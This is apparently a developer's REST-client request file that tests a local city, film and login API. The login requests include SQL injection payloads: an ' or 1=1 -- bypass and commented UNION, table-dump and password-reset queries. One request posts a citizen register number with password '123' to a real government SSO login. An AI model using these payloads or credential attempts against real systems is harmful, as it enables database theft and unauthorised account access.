###
GET http://localhost:3000

###
GET http://localhost:3000/api/cities/

###
POST http://localhost:3000/api/cities
Content-Type: application/json

{
    "cityName":"Darkhan",
    "countryId":1    
}

###
PUT http://localhost:3000/api/cities
Content-Type: application/json

{
    "city_id": "602",
    "city":"UB"    
}

###
POST http://localhost:3000/api/login
Content-Type: application/json

{
    "u": "guest",
    "p": "123"    
}

###
POST http://localhost:3000/api/login
Content-Type: application/json

{
    "u": "admin",
    "p":"' or 1=1 --"
    //"p":"1' union SELECT 1,1, column_name FROM information_schema.columns WHERE table_name = 'nevtrelt'; --"
}
    //"p":"'; select * from public.nevtrelt; --" 
    //"p":"1'; update public.nevtrelt set password=123 where id=1 --"


###
POST https://sso.gov.mn/login?response_type=code&client_id=e859507cb6753191fdc5e603-6eca8a874580cb019c762145b232684e&scope=W3sid3NkbCI6Imh0dHBzOi8veHlwLmdvdi5tbi9jaXRpemVuLTEuMy4wL3dzP1dTREwiLCJzZXJ2aWNlcyI6WyJXUzEwMDEwMV9nZXRDaXRpemVuSURDYXJkSW5mbyJdfSx7IndzZGwiOiJodHRwczovL3h5cC5nb3YubW4vZm9yZWlnbi1zZXJ2aWNlLTEuMy4wL3dzP1dTREwiLCJzZXJ2aWNlcyI6WyJGUzEwMDEwMV9wZXJzb25JbmZvIl19XQ==&redirect_uri=https://sso.e-mongolia.mn/sso-api/sso/access-grant&

regnum=%D0%91%D0%9275859686&password=123

###
GET http://localhost:3000/api/film

###
GET http://localhost:3000/api/film/183/comment?filterby=user&value=Tsogoo
###
GET http://localhost:3000/api/film/183select

###
GET http://localhost:3000/api/film?id=183&erembelehtalbar=name&sortorder=asc&urt=183&rating=4&includeComment=true


###
GET http://localhost:3000/api/country

###

GET http://localhost:3000/api/kino?rating=G&duration=6


###

GET http://localhost:3000/api/address?city_id=300select